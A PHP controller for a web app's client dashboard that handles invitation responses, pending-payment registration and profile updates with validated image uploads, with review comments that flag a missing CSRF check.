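<?php
require_once '../cuentame/core/Controller.php';
require_once '../cuentame/models/Emprendimiento.php';
require_once __DIR__ . '/../core/Helper.php';

/**
 * Client-facing dashboard controller ("panel").
 *
 * Every request through this controller needs an authenticated, non-admin
 * session; admins are redirected to their own dashboard in the constructor.
 * index() renders the dashboard and also handles the three POST actions the
 * dashboard submits: answering an activity invitation, registering a pending
 * payment, and updating the profile (including profile image / company logo
 * uploads).
 *
 * NOTE(review): none of the state-changing POST branches verifies a CSRF
 * token; confirm whether the view/Helper layer issues one and enforce it here.
 */
class PanelController extends Controller
{
    /**
     * Image types accepted for uploads, keyed by the MIME type detected from
     * the file content. The stored extension comes from this table, never
     * from the client-supplied filename.
     */
    private const IMAGE_EXTENSIONS = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
        'image/webp' => 'webp',
    ];

    /**
     * Starts the session (if not already active) and enforces access:
     * anonymous visitors go to the landing page, admins to their dashboard.
     */
    public function __construct()
    {
        // A front controller may already have started the session; calling
        // session_start() twice only produces a notice.
        if (session_status() !== PHP_SESSION_ACTIVE) {
            session_start();
        }

        if (!isset($_SESSION['user_id'])) {
            header('Location: ' . Helper::asset('index.html'));
            exit;
        }

        require_once __DIR__ . '/../models/User.php';
        $role = (new User())->getRole($_SESSION['user_id']);
        if ($role === 'admin') {
            header('Location: ' . Helper::appUrl('admin/dashboard'));
            exit;
        }
    }

    /**
     * Renders the client dashboard, or processes one of its POST actions and
     * redirects back to it.
     */
    public function index()
    {
        require_once '../cuentame/models/User.php';
        require_once '../cuentame/models/Project.php';
        require_once '../cuentame/models/Transaction.php';
        require_once '../cuentame/models/Payment.php';
        require_once '../cuentame/models/Activity.php';

        $userId = $_SESSION['user_id'];

        $activityModel = new Activity();
        $paymentModel  = new Payment();
        $userStats     = $paymentModel->getUserStats($userId);

        $data = [
            'user_name'         => $_SESSION['user_name'] ?? 'Usuario',
            'projects'          => (new Project())->getByUser($userId),
            'transactions'      => (new Transaction())->getByUser($userId),
            'payments'          => $paymentModel->getByUser($userId),
            'activities'        => $activityModel->getByUser($userId),
            'today_activities'  => $activityModel->getTodayActivities($userId),
            'week_activities'   => $activityModel->getWeekActivities($userId),
            'month_activities'  => $activityModel->getMonthActivities($userId),
            'activity_stats'    => $activityModel->getStats($userId),
            // Guarded so a stats row without the key does not raise a notice.
            'available_balance' => $userStats['available_balance'] ?? null,
            'user_stats'        => $userStats,
        ];

        // Data for the profile modal.
        $user = $this->model('User')->findById($userId);
        $data['user_email']    = $user['email'] ?? '';
        $data['profile_image'] = $user['profile_image'] ?? '/emprendo/assets/img/user-default.png';
        $data['company_logo']  = $user['company_logo'] ?? '/emprendo/assets/img/logo-blanco.png';

        if ($_SERVER['REQUEST_METHOD'] === 'POST') {
            $action = $_POST['action'] ?? null;

            // Each handler redirects and ends the request, so at most one runs.
            if ($action === 'respond_invitation') {
                $this->handleInvitationResponse($activityModel, $userId);
            } elseif ($action === 'create_payment') {
                $this->handlePaymentCreation($paymentModel, $userId);
            } elseif (isset($_POST['name'], $_POST['email'])) {
                $this->handleProfileUpdate($userId, $data);
            }
        }

        $this->view('panel/index', $data);
    }

    /**
     * POST action "respond_invitation": forwards the client's answer for one
     * activity to the model, then redirects back to the panel.
     *
     * Only the two answers the model expects ('confirmed' / 'declined') are
     * accepted; anything else is treated as a failed response.
     */
    private function handleInvitationResponse(Activity $activityModel, $userId): void
    {
        $activityId = $_POST['activity_id'] ?? null;
        $status     = $_POST['status'] ?? '';

        // NOTE(review): activity ids look numeric; if the model expects an
        // int, validate with FILTER_VALIDATE_INT here — confirm against Activity.
        $ok = $activityId !== null
            && $activityId !== ''
            && in_array($status, ['confirmed', 'declined'], true)
            && (bool) $activityModel->respondToInvitation($activityId, $userId, $status);

        $this->flashAndRedirect($ok, 'invitation_responded', 'invitation_response_failed');
    }

    /**
     * POST action "create_payment": registers a payment for the current user
     * and redirects back to the panel.
     *
     * The status is always 'Pendiente' — clients can only register pending
     * payments, the request may not choose the status. A missing or
     * non-positive amount, or a missing payment method, is a failure.
     */
    private function handlePaymentCreation(Payment $paymentModel, $userId): void
    {
        $amount = $_POST['amount'] ?? null;
        $method = $_POST['payment_method'] ?? '';

        if (!is_numeric($amount) || $amount <= 0 || $method === '') {
            $this->flashAndRedirect(false, 'payment_created', 'payment_creation_failed');
        }

        $paymentData = [
            'user_id'        => $userId,
            'amount'         => $amount,
            'payment_method' => $method,
            'reference'      => $_POST['reference'] ?? '',
            'description'    => $_POST['description'] ?? '',
            'status'         => 'Pendiente',
            'payment_date'   => $_POST['payment_date'] ?? date('Y-m-d'),
        ];

        $this->flashAndRedirect(
            (bool) $paymentModel->create($paymentData),
            'payment_created',
            'payment_creation_failed'
        );
    }

    /**
     * Profile form POST: stores any uploaded images, updates the user row and
     * redirects back to the panel (so a refresh does not resubmit the form).
     *
     * @param array $data Dashboard data already loaded for this user; its
     *                    'profile_image' / 'company_logo' entries are kept
     *                    when no new file is uploaded.
     */
    private function handleProfileUpdate($userId, array $data): void
    {
        $name  = $_POST['name'];
        $email = $_POST['email'];

        $profileImage = $this->storeUploadedImage('profile_image', 'profile_images', 'user_', $userId)
            ?? ($data['profile_image'] ?? null);
        $companyLogo = $this->storeUploadedImage('company_logo', 'company_logos', 'logo_', $userId)
            ?? ($data['company_logo'] ?? null);

        // updateProfileFull also carries the company logo and an optional phone number.
        $updated = $this->model('User')->updateProfileFull(
            $userId,
            $name,
            $email,
            $_POST['telefono'] ?? null,
            $profileImage,
            $companyLogo
        );

        if ($updated) {
            $_SESSION['user_name']       = $name;
            $_SESSION['success_message'] = 'profile_updated';
        } else {
            // The model reports failure when the e-mail already belongs to another user.
            $_SESSION['error_message'] = 'email_already_exists';
        }

        header('Location: ' . Helper::appUrl('clientes'));
        exit;
    }

    /**
     * Moves the file uploaded as $_FILES[$field] into uploads/<$subdir>/ and
     * returns its public path, or null when nothing usable was uploaded.
     *
     * The file must be a genuine upload whose content is recognised as one of
     * the types in IMAGE_EXTENSIONS; the extension written to disk is taken
     * from that detection, so arbitrary content cannot be stored under a
     * script extension in the web-served uploads directory.
     *
     * NOTE(review): also confirm the web server does not execute scripts
     * under uploads/ (a deny rule for that directory).
     */
    private function storeUploadedImage(string $field, string $subdir, string $prefix, $userId): ?string
    {
        $file = $_FILES[$field] ?? null;
        if ($file === null || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return null;
        }

        $tmp = $file['tmp_name'] ?? '';
        if ($tmp === '' || !is_uploaded_file($tmp)) {
            return null;
        }

        // Detect the type from the bytes, not from the client's filename.
        $info = getimagesize($tmp);
        $mime = is_array($info) ? ($info['mime'] ?? '') : '';
        $ext  = self::IMAGE_EXTENSIONS[$mime] ?? null;
        if ($ext === null) {
            return null;
        }

        $dir = __DIR__ . '/../../uploads/' . $subdir . '/';
        // 0755 rather than 0777: the PHP process owns the directory and is the
        // only writer it needs. The is_dir re-check covers a concurrent mkdir.
        if (!is_dir($dir) && !mkdir($dir, 0755, true) && !is_dir($dir)) {
            return null;
        }

        $fileName = $prefix . $userId . '_' . time() . '.' . $ext;
        if (!move_uploaded_file($tmp, $dir . $fileName)) {
            return null;
        }

        return '/emprendo/uploads/' . $subdir . '/' . $fileName;
    }

    /**
     * Stores a flash message in the session, redirects to the client panel
     * and ends the request.
     */
    private function flashAndRedirect(bool $ok, string $successKey, string $errorKey): void
    {
        if ($ok) {
            $_SESSION['success_message'] = $successKey;
        } else {
            $_SESSION['error_message'] = $errorKey;
        }

        header('Location: ' . Helper::appUrl('clientes'));
        exit;
    }

    /**
     * Chat was removed from the client panel; this action is intentionally a
     * no-op. Presumably kept so existing routes still resolve — confirm before
     * deleting.
     */
    public function sendMessage(): void
    {
    }

    /**
     * Chat was removed from the client panel; this action is intentionally a
     * no-op. Presumably kept so existing routes still resolve — confirm before
     * deleting.
     */
    public function getMessages(): void
    {
    }
}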